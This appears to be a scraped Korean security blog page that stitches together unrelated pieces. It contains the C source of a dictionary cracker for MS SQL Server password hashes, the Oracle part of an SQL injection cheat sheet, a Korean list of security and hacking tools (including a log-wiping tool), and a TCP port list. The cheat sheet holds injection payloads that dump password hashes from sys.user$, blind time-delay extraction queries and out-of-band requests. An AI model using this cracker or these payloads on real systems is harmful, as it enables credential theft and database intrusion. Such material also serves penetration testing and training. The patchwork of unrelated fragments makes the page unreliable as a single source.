      //           passwords can be attacked. This can be
      //           optimized considerably by not using the CryptoAPI.
      //
      //           (Compile with VC++ and link with advapi32.lib
      //           Ensure the Platform SDK has been installed, too!)
      //
      //////////////////////////////////////////////////////////////////////////////////
      #include <stdio.h>
      #include <windows.h>
      #include <wincrypt.h>
      FILE *fd=NULL;
      char *lerr = "\nLength Error!\n";
      int wd=0;
      int OpenPasswordFile(char *pwdfile);
      int CrackPassword(char *hash);
      int main(int argc, char *argv[])
      {
      	         int err = 0;
      	    if(argc !=3)
      	              {
      	                        printf("\n\n*** SQLCrack *** \n\n");
      	                        printf("C:\\>%s hash passwd-file\n\n",argv[0]);
      	                        printf("David Litchfield (david@ngssoftware.com)\n");
      	                        printf("24th June 2002\n");
      	                        return 0;
      	              }
      	    err = OpenPasswordFile(argv[2]);
      	    if(err !=0)
      	     {
      	       return printf("\nThere was an error opening the password file %s\n",argv[2]);
      	     }
      	    err = CrackPassword(argv[1]);
      	    fclose(fd);
      	    printf("\n\n%d",wd);
      	    return 0;
      }
      int OpenPasswordFile(char *pwdfile)
      {
      	    fd = fopen(pwdfile,"r");
      	    if(fd)
      	              return 0;
      	    else
      	              return 1;
      }
      int CrackPassword(char *hash)
      {
      	    char phash[100]="";
      	    char pheader[8]="";
      	    char pkey[12]="";
      	    char pnorm[44]="";
      	    char pucase[44]="";
      	    char pucfirst[8]="";
      	    char wttf[44]="";
      	    char uwttf[100]="";
      	    char *wp=NULL;
      	    char *ptr=NULL;
      	    int cnt = 0;
      	    int count = 0;
      	    unsigned int key=0;
      	    unsigned int t=0;
      	    unsigned int address = 0;
      	    unsigned char cmp=0;
      	    unsigned char x=0;
      	    HCRYPTPROV hProv=0;
      	    HCRYPTHASH hHash;
      DWORD hl=100;
      unsigned char szhash[100]="";
      int len=0;
      if(strlen(hash) !=94)
      	      {
      	              return printf("\nThe password hash is too short!\n");
      	      }
      if(hash[0]==0x30 && (hash[1]== 'x' || hash[1] == 'X'))
      	      {
      	              hash = hash + 2;
      	              strncpy(pheader,hash,4);
      	              printf("\nHeader\t\t: %s",pheader);
      	              if(strlen(pheader)!=4)
      	                        return printf("%s",lerr);
      	              hash = hash + 4;
      	              strncpy(pkey,hash,8);
      	              printf("\nRand key\t: %s",pkey);
      	              if(strlen(pkey)!=8)
      	                        return printf("%s",lerr);
      	              hash = hash + 8;
      	              strncpy(pnorm,hash,40);
      	              printf("\nNormal\t\t: %s",pnorm);
      	              if(strlen(pnorm)!=40)
      	                        return printf("%s",lerr);
      	              hash = hash + 40;
      	              strncpy(pucase,hash,40);
      	              printf("\nUpper Case\t: %s",pucase);
      	              if(strlen(pucase)!=40)
      	                        return printf("%s",lerr);
      	              strncpy(pucfirst,pucase,2);
      	              sscanf(pucfirst,"%x",&cmp);
      	      }
      else
      	      {
      	              return printf("The password hash has an invalid format!\n");
      	      }
      printf("\n\n       Trying...\n");
      if(!CryptAcquireContextW(&hProv, NULL , NULL , PROV_RSA_FULL                 ,0))
        {
      	      if(GetLastError()==NTE_BAD_KEYSET)
      	              {
      	                        // KeySet does not exist. So create a new keyset
      	                        if(!CryptAcquireContext(&hProv,
      	                                             NULL,
      	                                             NULL,
      	                                             PROV_RSA_FULL,
      	                                             CRYPT_NEWKEYSET ))
      	                           {
      	                                    printf("FAILLLLLLL!!!");
      	                                    return FALSE;
      	                           }
      	       }
      }
      while(1)
      	     {
      	       // get a word to try from the file
      	       ZeroMemory(wttf,44);
      	       if(!fgets(wttf,40,fd))
      	          return printf("\nEnd of password file. Didn't find the password.\n");
      	       wd++;
      	       len = strlen(wttf);
      	       wttf[len-1]=0x00;
      	       ZeroMemory(uwttf,84);
      	       // Convert the word to UNICODE
      	       while(count < len)
      	                 {
      	                           uwttf[cnt]=wttf[count];
      	                           cnt++;
      	                           uwttf[cnt]=0x00;
      	                           count++;
      	                           cnt++;
      	                 }
      	       len --;
      	       wp = &uwttf;
      	       sscanf(pkey,"%x",&key);
      	       cnt = cnt - 2;
      	       // Append the random stuff to the end of
      	       // the uppercase unicode password
      	       t = key >> 24;
      	       x = (unsigned char) t;
      	       uwttf[cnt]=x;
      	       cnt++;
      	       t = key << 8;
      	       t = t >> 24;
      	     x = (unsigned char) t;
      	     uwttf[cnt]=x;
      	     cnt++;
      	     t = key << 16;
      	     t = t >> 24;
      	     x = (unsigned char) t;
      	     uwttf[cnt]=x;
      	     cnt++;
      	     t = key << 24;
      	     t = t >> 24;
      	     x = (unsigned char) t;
      	     uwttf[cnt]=x;
      	     cnt++;
      // Create the hash
      if(!CryptCreateHash(hProv, CALG_SHA, 0 , 0, &hHash))
      	     {
      	               printf("Error %x during CryptCreatHash!\n", GetLastError());
      	               return 0;
      	     }
      if(!CryptHashData(hHash, (BYTE *)uwttf, len*2+4, 0))
      	     {
      	               printf("Error %x during CryptHashData!\n", GetLastError());
      	               return FALSE;
      	     }
      CryptGetHashParam(hHash,HP_HASHVAL,(byte*)szhash,&hl,0);
      // Test the first byte only. Much quicker.
      if(szhash[0] == cmp)
      	     {
      	               // If first byte matches try the rest
      	               ptr = pucase;
      	               cnt = 1;
      	               while(cnt < 20)
      	               {
      	                           ptr = ptr + 2;
      	                           strncpy(pucfirst,ptr,2);
      	                           sscanf(pucfirst,"%x",&cmp);
      	                           if(szhash[cnt]==cmp)
      	                                    cnt ++;
      	                           else
      	                           {
      	                                    break;
      	                           }
      	               }
      	               if(cnt == 20)
      	               {
      	                    // We've found the password
      	                    printf("\nA MATCH!!! Password is %s\n",wttf);
      	                    return 0;
      	                 }
      	         }
      	         count = 0;
      	         cnt=0;
      	       }
        return 0;
      }
      					

    Oracle

    Default Databases

    SYSTEMAvailable in all versions
    SYSAUXAvailable in all versions

    Comment Out Query

    The following can be used to comment out the rest of the query after your injection:

    --SQL comment

    Example:
    • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

    Testing Version

    SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
    SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
    SELECT version FROM v$instance;

    Note:

    • All SELECT statements in Oracle must contain a table.
    • dual is a dummy table which can be used for testing.

    Database Credentials

    SELECT username FROM all_users;Available on all versions
    SELECT name, password from sys.user$;Privileged, <= 10g
    SELECT name, spare4 from sys.user$;Privileged, <= 11g

    Database Names

    Current Database

    SELECT name FROM v$database;
    SELECT instance_name FROM v$instance
    SELECT global_name FROM global_name
    SELECT SYS.DATABASE_NAME FROM DUAL

    User Databases

    SELECT DISTINCT owner FROM all_tables;

    Server Hostname

    SELECT host_name FROM v$instance; (Privileged)
    SELECT UTL_INADDR.get_host_name FROM dual;
    SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
    SELECT UTL_INADDR.get_host_address FROM dual;

    Tables and Columns

    Retrieving Tables

    SELECT table_name FROM all_tables;

    Retrieving Columns

    SELECT column_name FROM all_tab_columns;

    Find Tables from Column Name

    SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

    Find Columns From Table Name

    SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

    Retrieving Multiple Tables at once

    SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

    Avoiding the use of quotations

    Unlike other RDBMS, Oracle allows table/column names to be encoded.

    SELECT 0x09120911091 FROM dual;Hex Encoding.
    SELECT CHR(32)||CHR(92)||CHR(93) FROM dual;CHR() Function.

    String Concatenation

    SELECT 'a'||'d'||'mi'||'n' FROM dual;

    Conditional Statements

    SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

    Timing

    Time Delay

    SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

    Heavy Time Delays

    AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

    Privileges

    SELECT privilege FROM session_privs;
    SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

    Out Of Band Channeling

    DNS Requests

    SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
    SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

    Password Cracking

    A Metasploit module for JTR can be found here.

    Extras

    About

    This Knowledge Base was put together and is maintained by Roberto Salgado, Co-Founder of Websec. It is a compilation of books, papers, cheatsheets and testing done by Roberto over the years.

    Contact

    Please feel free to send any suggestions you may have to @LightOS or e-mail.

    Special Thanks

    Garrett HyderHelped me tremendously with the CSS and some JQuery bugs.
    Johannes DahseHelped me create the original version.
    Lisa RichardsMade the tough decisions for me.
    Mario HeiderichHelped me create the original version.
    Pedro JoaquínMotivated me to finish this.

    Contributions

    Paulino CalderónGave me the idea of adding a changelog.
    Alejandro HernándezPointed out some missing code for the password crackers.
    Denis BaranovContributed with links for Error based methods and Acknowledgements.
    idContributed links for the JTR-MSF modules.
    NurfedContributed a method for retrieving multiple tables at once in MSSQL 2005+.
    PenTesticlesMinor correction to MSSQL xp_cmdshell.
    Ryan BarnettBrought to my attention an extra method for WAITFOR timing in MSSQL.

    Acknowledgements

    HackforumsA method for retrieving multiple tables/columns at once.
    RDotA lot of the error based vectors originated from this site.

    Last Updated


실습.

Posted by yangdaegam
l

TOOOOOOOOOOOOOLS

WORK/SECURITY 2011. 8. 2. 11:07

백도어/악성코드 
터보백신2001 : S&S에서 무료로 제공하는 Windows용 바이러스, 백도어, 트로이 목마 검사 
> AMaViS (A Mail Virus Scanner) – 0.2.1 Pre 2 : Unix환경에서 메일에 첨부된 파일에 대한 바이러스 검사 
> AnalogX Script Defender 1.01 : Visual Basic Scripting (.VBS), Java Script (.JS)로 만들어진 바이러스의 공격을 차단 
> Anti-Trojan 4.0.98 : Back Orifice 2000(BO2K)를 포함 98개의 트로이목마를 탐지, 제거 
> Antidote PC SuperLite : Download후 install없이 바로 실행할 수 있는 간단한 바이러스 체크 프로그램 
> BFB Tester : Binary를 체크하여 argument 오버플로우나 환경 오버플로우를 검사 
> Cleaner 3.0 : Trojan 탐지/제거 
> MailCleaner 2.6 : Microsoft의 Outlook과 Outlook Express에서 수신한 메일이 바이러스를 포함한 경우 자동삭제 
> Purge-It 1.1 : Backdoor, Trojan, Spyware같은 악성 프로그램 탐지, 제거/악성 프로그램에 의한 시스템의 피해확인 
> Rkdet 0.51 : Rootkit 설치나 패킷 스니퍼 설치를 감시 
> SurfinGuard 192b : 개인 PC에서의 sandbox 보안모델/숨겨진 trojan, worm같은 악성 프로그램을 감시<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><?XML:NAMESPACE PREFIX = O /> 
> WinZapper : 윈도우에서 들어 갔다 나오면서 로그 지우는 툴

파일무결성 
> AIDE (Advanced Intrusion Detection Environment) 0.7 : Tripwire 대체 프로그램 
> BSIGN : 실행/이진 파일 확인 및 인증 
> FCheck 2.07.51 : 윈도우 시스템 침입탐지/정책시행, 유닉스 서버관리용 perl script 
> FileTraq 0.2 : crontab에 등록되어 주기적으로 시스템 파일 비교 
> fs-spider : 사용자 정의에 따라 배드 퍼미션을 찾아낸다 
> Osiris Scripts : 두개의 실행파일 카탈로그를 만들어 비교한다. 
> Secure Portal : 선택한 파일들에 대해 "요주의 단어" 를 감시하여 GUI로 보여준다 
> Sherpa 0.1.4 : 시스템 보안 구성 관리 및 검사 도구. 파일 및 디렉토리 퍼미션 검사 
> Toby : Tripwire 대체 프로그램. 파일 체크섬 유지 
> Triplight : 침입 탐지 및 무결성 검사 프로그램 
> Tripwall : 침입 탐지 및 무결성 검사 프로그램 
> Tripwire 1.3 : 파일 및 디렉토리 무결성 검사 프로그램. 
> ViperDB : Tripwire에 대한 옵션 도구 
> Watchfile : 스크린에 파일 목록을 보여주고 상태를 계속해서 업데이트한다. 

법적증거 
> AFind : 파일을 접근시간별로 분류 (로그온 시간과 비교가능) 
> DumpEvt : 윈도우 NT 이벤트 로그 덤프 
> DumpSec : Permission/감사 설정 덤프 
> Forensic Toolkit 1.4 : NTFS 파티션에서 불법행위 체크 
> NTLast v1.6 : 윈도우 NT를 위한 보안감사 툴 
> TCT (The Coroner’s Toolkit) : 유닉스 시스템에서 forensics 정보를 수집하고 분석하는 도구. SATAN 개발자가 만든 forensic 도구임. 
> Tfn2kpass : tfn2k의 패스워드를 복구, 감염된 시스템을 모두 알아낼 수 있게 해준다. 

호스트 
> Audit Daemon For Linux 1.11 : 리눅스 커널로부터 생성된 감사추적 로그를 필터링하여 특정 로그 파일로 저장 
> Autoconf-sectest : 개발 CODE를 Configure할 때 일반적인 보안홀과 잘못된 구성을 체크 
> Check.pl : 파일과 디렉토리에 대한 permission을 검사하여 위험한 파일들의 목록을 출력 
> COPS : UNIX 시스템 관리자, 프로그래머, 운영자를 위한 보안도구모음 
> GNIT : NT Vulnerablility Scanner 
> GORK v2.0b : tcp/udp/icmp/ip 덤프, From/To 를 지정해서 필터링 할 수 있음. 
> IISperms : IIS 보안문제 해결에 도움 
> Instructor 1.0 : 32bit instruction set auditor 
> Inzider 1.2 : 윈도우 프로세스들이 Listening하는 포트를 나열 
> L0pht watch : Linux Basic Security Module ( BSM ) 리눅스 감사 도구 
> NetStat Live : TCP/IP 프로토콜 모니터 
> NT Regpack : NT Registry Hardener 
> Perro : 들어오는 IP/TCP, IP/UDP , IP/ICMP 패킷을 기록 
> Sara 3.2.3 : 유닉스 기반의 보안점검 도구 
> Syscheck : 미리 정의된 시스템 보안 위반사항을 검사하여 로그나 이메일로 경고 
> SARA (Security Auditor’s Research Assistant) : 유닉스 시스템의 보안문제점을 점검 

로그분석 
> Acct0.91 : 리눅스 Accounting 도구 
> ASAX – Advanced Security audit trail Analisys on uniX 1.0 : 순차파일의 지능적 분석을 간단하게 해주는 도구 
> Calamaris : Squid V1.1.x, V1.2.x, V2.x 와 NetCache의 로그를 분석하여 리포팅 
> ColorLogs : 로그파일에 색을 입혀 쉽게 알아볼 수 있게 하는 도구 
> fwinfo, fwreport : Firewall-1의 보안정책을 HTML로 변환, Firewall-1의 대역폭 사용을 리포트 
> fwlogstat : Firewall-1의 Account Log 분석을 도와주는 도구 
> LogCheck : 시스템 로그파일에 비정상적인 행위가 있었는지 검사 
> Log Scanner : 로그파일에 미리 정의된 비정상 행위가 있는지 검사하여 시스템 관리자에게 메일/호출 등으로 알려줌 
> Logsurfer : 텍스트 형식의 로그파일을 실시간 감시 
> Logwatch : 네트웍상의 여러 시스템의 로그파일을 Client/Server 방식으로 볼 수 있음 
> NLog : nmap 로그파일을 분석 및 관리 
> Reptor : Axent Raptor Firewall의 로그분석 및 리포트 
> Ricochet : 스팸메일을 추적하여 메일이 발송된 시스템 관리자에게 항의 메일을 발송 
> SRS (Secure Remote Streaming) : syslogd의 대체프로그램, 안전한 로깅, SSL을 통한 서버로의 로그전송 
> Syslog-ng (Next Generation) : syslogd의 대체 프로그램, 뛰어난 로그 Configurability, message 무결성,암호화 
> tcpdump2ascii : tcpdump -x 의 출력을 분석하여 ASCII 형태로 보여줌 
> WDumpEvt : 윈도우 NT 로그 정보의 관리를 쉽게 해주는 도구 
> WinAudlog : 네트웍에 분산된 시스템 로그파일을 중앙에서 검사하고 침입자의 로그파일 변조여부를 조사 
> WindowsNT : Syslog Service 윈도우 NT의 이벤트를 한줄로 변환하여 syslog 호스트에게 전송 

네트워크 
> AntiSniff : 네트웍 상에 Promiscuous 모드로 동작하는 호스트가 있는지 점검. 
> APSEND : Firewall이나 다른 네트웍 응용프로그램 테스트를 위한 TCP/IP 패킷 전송도구 
> Blast : TCP 스트레스 테스트 도구. 네트워크 서버의 잠재적인 취약성 발견에도 도움이 됨 
> BOping : 백오리피스 스캐너 
> Cerberus : Internet Scanner 취약점 점검도구 
> DDoSping : DDoS 스캐너 
> DNScache : 보안을 고려한 DNS 도구 모음. BIND의 안전한 대체로 사용가능 
> FtpCheck : 호스트/네트웍을 스캔하여 FTP나 anonymous FTP archive를 찾아냄 
> getsvrinfo.exe : 원격 NT서버의 NetBIOS이름, 도메인/워크그룹/ 로그인한 사용자 수, 버전 등을 알아내는 도구 
> httptype : http 호스트의 목록을 읽어 HTTP 서버의 종류를 보여줌 
> Hping2 : Custom ICMP/TCP/UDP 패킷을 전송. 방화벽 Rule점검, 포트스캔, 네트웍 성능측정,….. 
> HUNT : Connection을 관찰, 리셋하여 이에 침입하는 프로그램 
> HyperTrace : traceroute의 GUI 버전 
> ICIS (IP Stack Integrity Checker) : IP 스택의 안정성과 Firewall rule 통과시험등을 테스트 
> icmpenum : icmp echo, timestamp, info 패킷을 모두 사용하여 네트웍의 잠재적 타겟을 결정하고 스푸핑과 응답 패킷 스니핑이 가능 
> ICMPush : 명령줄에서 Customize된 ICMP 패킷을 보낼 수 있음 
> Intact : 시스템의 스냅샷을 저장해 두고 주기적으로 검사하여 침입, 바이러스, 트로이 목마 등을 탐지 
> IPaudit : 네트웍 디바이스를 promiscuous 모드로 하여 모든 connection을 기록 
> iplog : TCP,UDP,ICMP 트래픽을 로그, 여러가지 공격과 스캔을 탐지 
> ippacket : 리눅스 명령줄에서 IP/TCP/UDP/ICMP 패킷을 생성하는 유틸리티 
> Leapfrog : 포트 위장, Redirect 
> Lookout : TCP 접속을 통해 보내진 데이타에 접근, 프로토콜 검사 및 버퍼 테스트를 가능하게 함 
> md-webscan : CGI 취약점 스캔. 180개 취약점 
> Narrow Security Scanner : 원격 취약점 스캐너 
> Nbtdump : 윈도우 NT, 2000, NIX 삼바로부터 NetBios 정보를 얻어냄 
> Nessus : 원격 보안스캐너 
> NetMon : 네트웍 규모의 프로세스 모니터 
> NetSaint : 네트웍 상의 호스트와 서비스 모니터, 이메일/ 호출 통지 
> Netsaint Console Monitor : NetSaint의 콘솔 모니터, GUI없이 감시 가능 
> NTOTools : Lservers(NetBios name 덤프), NTOLog((도메인 전체 로그 백업), NPList (네트웍 프로세스 덤프), NTODrv(네트웍 드라이버/서비스 덤프) 
> NTOMax : 네트웍 버퍼 스트레스 테스트 
> PacketX : Firewall 테스트 도구, 패킷 스푸핑, raw 패킷 생성 등 
> PIKT- Problem Informant/Killer Tool : 네트웍의 이기종 시스템들을 관리하기 위한 응용프로그램과 구성파일 모음. 시스템 감시, 문제보고, 문제해결 
> Queso : 원격 OS 탐지 
> relaycheck : 릴레이를 허용하는 SMTP 서버 스캔 
> SAINT – Security Administrator’s Integrated Network Tool : SATAN에 기반한 보안 평가 도구. Firewall을 통한 스캔, 4보안레벨, CERT/CIAC 공시 반영 
> Sam Spade : 윈도우 시스템을 위한 종합 네트웍 쿼리 도구 
> SATAN : 네트웍관련 보안 문제 점검도구 
> scanlogd : 포트 스캔을 감지하여 syslog에 기록 
> Send Packet : TCP/UDP/ICMP/IP 패킷 "customizer" 
> SendIP : Arbitrary IP 패킷을 보낼 수 있는 도구 
> SID2User & User2SID : 로컬 또는 원격 시스템의 SAM으로부터 User ID를 알아내고, 사용자 계정 및 그외의 것들을 알아냄 
> Siphon : 수동적 TCP mapping과 호스트 확인 
> SMB Downgrade Attacker : 사용자가 원격으로 공유를 시도하기를 기다리다가 사용자 이름과 패스워드를 Clear text로 획득하려고 시도 
> SpiderMap 0.1 : 정교하게 조절된 네트웍 스캔을 가능하게 하는 스크립트 모음 
> Stack Shield : 프로그램이 스택 스매싱 공격으로부터 안전하도록 컴파일시 보호책을 추가 
> SuperScan : 강력한 connection-based TCP 포트 스캐너, Pinger, Hostname Resolver 
> TCPdump 3.5.2 : 네트웍 트래픽을 보여준다. 
> TCPView v1.11 : TCP 및 UDP 세션의 자세한 목록을 보여줌 
> UltraScan : 강력한 네트웍 스캐너. 불법 웹서버,FTP서버, 기타 불법 서비스 운영상황 파악 
> Virtual eXecuting Environment : 유닉스 서버를 네트웍 침입자로부터 보호 
> VoidEye : CGI 취약점 스캐너 
> Windump : TCPDump의 윈도우 버전 
> Winfingerprint : 윈도우 OS 탐지, 각종 서버,공유,사용자, 그룹 정보 수집 
> WUPS : 윈도우 UDP 포트 스캐너 
> Zombie Zapper : 패킷을 범람시키는 좀비 시스템에게 중단을 명령. 좀비의 활동을 중지. Trinoo,TFN,Stacheldraht 방어. 
> Pinger :  Visual C=++ 로 작성된 스캐너 프로그램 – 윈도우 2000에서 작동되지 않음 
> Pinger(http://www.nmrc.org/files/snt/
> Ping Sweep(www.solarwinds.net
> WS_PingProPack(www.ipswitch.com)  – 괜찮음 
> Netscan(www.nwpsw.com)

패스워드 
> Brutus : 온라인 또는 원격 패스워드 크래커 
> Fast Zip Crack : zip 패스워드 크랙 프로그램 
> fcrackzip : zip 패스워드 크랙 프로그램 
> John the Ripper : 유닉스,도스,윈도우용 패스워드 크래커 
> L0phtCrack : NT 패스워드 크래커 
> passwd+ : 패스워드 (패스워드 유효성) 검사 
> PKCrack : PKZIP 패스워드 크래커 
> Pwdump : NT의 SAM 데이타베이스로부터 패스워드 해쉬를 덤프 
> Remote Password Assasin (RPA) : 네트웍을 통한 패스워드 크래커 
> SQLdict : SQL 사전(dictionary) 공격 도구 
> Strongpass 1.0 : 패스워드 강화도구 
> Viper : 유닉스 패스워드 크래커, 문자조합 
> Xavior : 원격 패스워드 감사 및 복구 도구

Posted by yangdaegam
l

Port List

WORK/SECURITY 2011. 1. 18. 00:40

TCP/IP 알려진 Port List

TCP 0 Reserved
TCP 1 Port Service Multiplexer
TCP 2 Management Utility
TCP 3 Compression Process
TCP 4 Unassigned
TCP 5 Remote Job Entry
TCP 6 Unassigned
TCP 7 Echo
TCP 8 Unassigned
TCP 9 Discard
TCP 10 Unassigned
TCP 11 Active Users
TCP 12 Unassigned
TCP 13 Daytime (RFC 867)
TCP 14 Unassigned
TCP 15 Unassigned [was netstat]
TCP 16 Unassigned
TCP 17 Quote of the Day
TCP 18 Message Send Protocol
TCP 19 Character Generator
TCP 20 File Transfer [Default Data]
TCP 21 File Transfer [Control]
TCP 22 SSH Remote Login Protocol
TCP 23 Telnet
TCP 24 any private mail system
TCP 25 Simple Mail Transfer
TCP 26 Unassigned
TCP 27 NSW User System FE
TCP 28 Unassigned
TCP 29 MSG ICP
TCP 30 Unassigned
TCP 31 MSG Authentication
TCP 32 Unassigned
TCP 33 Display Support Protocol
TCP 34 Unassigned
TCP 35 any private printer server
TCP 36 Unassigned
TCP 37 Time
TCP 38 Route Access Protocol
TCP 39 Resource Location Protocol
TCP 40 Unassigned
TCP 41 Graphics
TCP 42 Host Name Server
TCP 43 WhoIs
TCP 44 MPM FLAGS Protocol
TCP 45 Message Processing Module [recv]
TCP 46 MPM [default send]
TCP 47 NI FTP
TCP 48 Digital Audit Daemon
TCP 49 Login Host Protocol (TACACS)
TCP 50 Remote Mail Checking Protocol
TCP 51 IMP Logical Address Maintenance
TCP 52 XNS Time Protocol
TCP 53 Domain Name Server
TCP 54 XNS Clearinghouse
TCP 55 ISI Graphics Language
TCP 56 XNS Authentication
TCP 57 any private terminal access
TCP 58 XNS Mail
TCP 59 any private file service
TCP 60 Unassigned
TCP 61 NI MAIL
TCP 62 ACA Services
TCP 63 whois++
TCP 64 Communications Integrator (CI)
TCP 65 TACACS-Database Service
TCP 66 Oracle SQL*NET
TCP 67 Bootstrap Protocol Server
TCP 68 Bootstrap Protocol Client
TCP 69 Trivial File Transfer
TCP 70 Gopher
TCP 71 Remote Job Service
TCP 72 Remote Job Service
TCP 73 Remote Job Service
TCP 74 Remote Job Service
TCP 75 any private dial out service
TCP 76 Distributed External Object Store
TCP 77 any private RJE service
TCP 78 vettcp
TCP 79 Finger
TCP 80 World Wide Web HTTP
TCP 81 HOSTS2 Name Server
TCP 82 XFER Utility
TCP 83 MIT ML Device
TCP 84 Common Trace Facility
TCP 85 MIT ML Device
TCP 86 Micro Focus Cobol
TCP 87 any private terminal link
TCP 88 Kerberos
TCP 89 SU/MIT Telnet Gateway
TCP 90 DNSIX Securit Attribute Token Map
TCP 91 MIT Dover Spooler
TCP 92 Network Printing Protocol
TCP 93 Device Control Protocol
TCP 94 Tivoli Object Dispatcher
TCP 95 SUPDUP
TCP 96 DIXIE Protocol Specification
TCP 97 Swift Remote Virtural File Protocol
TCP 98 Linuxconf / TAC News
TCP 99 Metagram Relay
TCP 100 [unauthorized use]
TCP 101 NIC Host Name Server
TCP 102 ISO-TSAP Class 0
TCP 103 Genesis Point-to-Point Trans Net
TCP 104 ACR-NEMA Digital Imag. &Comm. 300
TCP 105 Mailbox Name Nameserver
TCP 106 3COM-TSMUX
TCP 107 Remote Telnet Service
TCP 108 SNA Gateway Access Server
TCP 109 Post Office Protocol - Version 2
TCP 110 Post Office Protocol - Version 3
TCP 111 SUN Remote Procedure Call
TCP 112 McIDAS Data Transmission Protocol
TCP 113 Authentication Service
TCP 114 Audio News Multicast
TCP 115 Simple File Transfer Protocol
TCP 116 ANSA REX Notify
TCP 117 UUCP Path Service
TCP 118 SQL Services
TCP 119 Network News Transfer Protocol
TCP 120 CFDPTKT
TCP 121 Encore Expedited Remote Pro.Call
TCP 122 SMAKYNET
TCP 123 Network Time Protocol
TCP 124 ANSA REX Trader
TCP 125 Locus PC-Interface Net Map Ser
TCP 126 Unisys Unitary Login
TCP 127 Locus PC-Interface Conn Server
TCP 128 GSS X License Verification
TCP 129 Password Generator Protocol
TCP 130 cisco FNATIVE
TCP 131 cisco TNATIVE
TCP 132 cisco SYSMAINT
TCP 133 Statistics Service
TCP 134 INGRES-NET Service
TCP 135 DCE endpoint resolution
TCP 136 PROFILE Naming System
TCP 137 NETBIOS Name Service
TCP 138 NETBIOS Datagram Service
TCP 139 NETBIOS Session Service
TCP 140 EMFIS Data Service
TCP 141 EMFIS Control Service
TCP 142 Britton-Lee IDM
TCP 143 Internet Message Access Protocol
TCP 144 Universal Management Architecture
TCP 145 UAAC Protocol
TCP 146 ISO-IP0
TCP 147 ISO-IP
TCP 148 Jargon
TCP 149 AED 512 Emulation Service
TCP 150 SQL-NET
TCP 151 HEMS
TCP 152 Background File Transfer Program
TCP 153 SGMP
TCP 154 NETSC
TCP 155 NETSC
TCP 156 SQL Service
TCP 157 KNET/VM Command/Message Protocol
TCP 158 PCMail Server
TCP 159 NSS-Routing
TCP 160 SGMP-TRAPS
TCP 161 SNMP
TCP 162 SNMPTRAP
TCP 163 CMIP/TCP Manager
TCP 164 CMIP/TCP Agent
TCP 165 Xerox
TCP 166 Sirius Systems
TCP 167 NAMP
TCP 168 RSVD
TCP 169 SEND
TCP 170 Network PostScript
TCP 171 Network Innovations Multiplex
TCP 172 Network Innovations CL/1
TCP 173 Xyplex
TCP 174 MAILQ
TCP 175 VMNET
TCP 176 GENRAD-MUX
TCP 177 X Display Manager Control Protocol
TCP 178 NextStep Window Server
TCP 179 Border Gateway Protocol
TCP 180 Intergraph
TCP 181 Unify
TCP 182 Unisys Audit SITP
TCP 183 OCBinder
TCP 184 OCServer
TCP 185 Remote-KIS
TCP 186 KIS Protocol
TCP 187 Application Communication Interface
TCP 188 Plus Five's MUMPS
TCP 189 Queued File Transport
TCP 190 Gateway Access Control Protocol
TCP 191 Prospero Directory Service
TCP 192 OSU Network Monitoring System
TCP 193 Spider Remote Monitoring Protocol
TCP 194 Internet Relay Chat Protocol
TCP 195 DNSIX Network Level Module Audit
TCP 196 DNSIX Session Mgt Module Audit Redir
TCP 197 Directory Location Service
TCP 198 Directory Location Service Monitor
TCP 199 SMUX
TCP 200 IBM System Resource Controller
TCP 201 AppleTalk Routing Maintenance
TCP 202 AppleTalk Name Binding
TCP 203 AppleTalk Unused
TCP 204 AppleTalk Echo
TCP 205 AppleTalk Unused
TCP 206 AppleTalk Zone Information
TCP 207 AppleTalk Unused
TCP 208 AppleTalk Unused
TCP 209 The Quick Mail Transfer Protocol
TCP 210 ANSI Z39.50
TCP 211 Texas Instruments 914C/G Terminal
TCP 212 ATEXSSTR
TCP 213 IPX
TCP 214 VM PWSCS
TCP 215 Insignia Solutions
TCP 216 Computer Associates Int'l License Server
TCP 217 dBASE Unix
TCP 218 Netix Message Posting Protocol
TCP 219 Unisys ARPs
TCP 220 Interactive Mail Access Protocol v3
TCP 221 Berkeley rlogind with SPX auth
TCP 222 Berkeley rshd with SPX auth
TCP 223 Certificate Distribution Center
TCP 224 masqdialer
TCP 242 Direct
TCP 243 Survey Measurement
TCP 244 inbusiness
TCP 245 LINK
TCP 246 Display Systems Protocol
TCP 247 SUBNTBCST_TFTP
TCP 248 bhfhs
TCP 256 RAP/Checkpoint SNMP
TCP 257 Check Point / Secure Electronic Transaction
TCP 258 Check Point / Yak Winsock Personal Chat
TCP 259 Check Point Firewall-1 telnet auth / Efficient Short Remote Operations
TCP 260 Openport
TCP 261 IIOP Name Service over TLS/SSL
TCP 262 Arcisdms
TCP 263 HDAP
TCP 264 BGMP / Check Point
TCP 265 X-Bone CTL
TCP 266 SCSI on ST
TCP 267 Tobit David Service Layer
TCP 268 Tobit David Replica
TCP 280 HTTP-mgmt
TCP 281 Personal Link
TCP 282 Cable Port A/X
TCP 283 rescap
TCP 284 corerjd
TCP 286 FXP-1
TCP 287 K-BLOCK
TCP 308 Novastor Backup
TCP 309 EntrustTime
TCP 310 bhmds
TCP 311 AppleShare IP WebAdmin
TCP 312 VSLMP
TCP 313 Magenta Logic
TCP 314 Opalis Robot
TCP 315 DPSI
TCP 316 decAuth
TCP 317 Zannet
TCP 318 PKIX TimeStamp
TCP 319 PTP Event
TCP 320 PTP General
TCP 321 PIP
TCP 322 RTSPS
TCP 333 Texar Security Port
TCP 344 Prospero Data Access Protocol
TCP 345 Perf Analysis Workbench
TCP 346 Zebra server
TCP 347 Fatmen Server
TCP 348 Cabletron Management Protocol
TCP 349 mftp
TCP 350 MATIP Type A
TCP 351 bhoetty (added 5/21/97)
TCP 352 bhoedap4 (added 5/21/97)
TCP 353 NDSAUTH
